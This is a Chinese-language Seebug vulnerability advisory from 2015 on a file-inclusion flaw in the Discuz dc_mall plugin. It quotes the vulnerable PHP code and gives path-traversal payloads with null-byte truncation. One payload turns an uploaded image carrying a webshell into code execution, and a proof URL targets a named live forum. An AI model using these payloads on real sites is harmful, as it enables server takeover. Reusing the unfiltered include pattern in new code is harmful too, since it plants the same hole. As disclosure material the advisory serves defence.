discuz某插件设计缺陷可前台getshell(有较强条件限制)

2015-08-04T00:00:00
ID SSV:93754
Type seebug
Reporter Root
Modified 2015-08-04T00:00:00

Description

简要描述:

设计缺陷

详细说明:

discuz积分商城插件任意文件包含(最新版测试)

插件信息:

http://addon.discuz.com/?@dc_mall.plugin 官方安装量3000+ (已经不少了吧)

<img src="https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">

关键字搜一下:

折腾了半天才搞定成功云平台服务。。终于可以装插件了。。。

测试环境:

PHP 版本为: 5.2.9-2 magic_quotes_gpc = off

先看看代码吧:

dc_mall.inc.php(漏洞文件)

&lt;?php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } $_lang = lang('plugin/dc_mall'); $action = $_GET['action'] ? $_GET['action'] : 'index'; $version ='Ver 1.1.1'; $cvar = $_G['cache']['plugin']['dc_mall']; $file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//action参数未过滤直接传入$file 后面的用%00截断即可包含任意文件 if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action'); $usercredit = getuserprofile('extcredits'.$cvar['credit']); $mallnav = C::t('#dc_mall#dc_mall_sort')-&gt;getdata(); $sortid = dintval($_GET['sortid']); if(empty($mallnav[$sortid]))$sortid=0; @include $file; $croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php'; $cronupdate = @include $croppath; if(TIMESTAMP-$cronupdate['timestamp']&gt;$cvar['autotime']*60){ require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php'; build_cache_plugin_mallinfo(); $configdata = 'return '.var_export(array('timestamp'=&gt;TIMESTAMP), true).";\n\n"; if($fp = @fopen($croppath, 'wb')) { fwrite($fp, "&lt;?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?&gt;"); fclose($fp); } } include template('dc_mall:index/'.$action); ?&gt;

包含测试

<img src="https://images.seebug.org/upload/201508/031936395bfde0824b37810666dde38f70794f85.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">

getshell

怎么shell就不用多说了,前台上传带马图片,在直接用包含就成功 www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

<img src="https://images.seebug.org/upload/201508/03193700768ff9afe86e04b8f19d23a9ada50c4a.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

http://bbs.medkaoyan.net/plugin.php?action=../../../../../robots.txt%00&id=dc_mall